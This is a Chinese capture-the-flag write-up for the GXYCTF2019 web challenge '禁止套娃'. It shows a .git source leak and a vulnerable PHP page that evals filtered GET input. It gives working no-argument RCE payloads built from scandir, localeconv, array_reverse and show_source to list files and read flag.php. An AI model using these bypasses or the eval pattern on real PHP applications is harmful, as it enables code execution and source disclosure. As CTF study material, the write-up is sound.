GXYCTF2019-WEB-禁止套娃

复现地址:[https://buuoj.cn/challenges]

0x00知识点:

  • .git文件源码泄露
  • 无参数RCE
    localeconv() 函数返回一包含本地数字及货币格式信息的数组。
    scandir() 列出 images 目录中的文件和目录。
    readfile() 输出一个文件。
    current() 返回数组中的当前单元, 默认取第一个值。
    pos() current() 的别名。
    next() 函数将内部指针指向数组中的下一个元素,并输出。
    array_reverse()以相反的元素顺序返回数组。
    highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。

0x01 解题

打开文件什么都没有,输入什么页面都没有变化

通过git扫描工具扫描发现index.php

image.png
";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>
POST /?exp=print_r(scandir(pos(localeconv())));
GXYCTF2019-WEB-禁止套娃_第1张图片
image.png

之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

你可能感兴趣的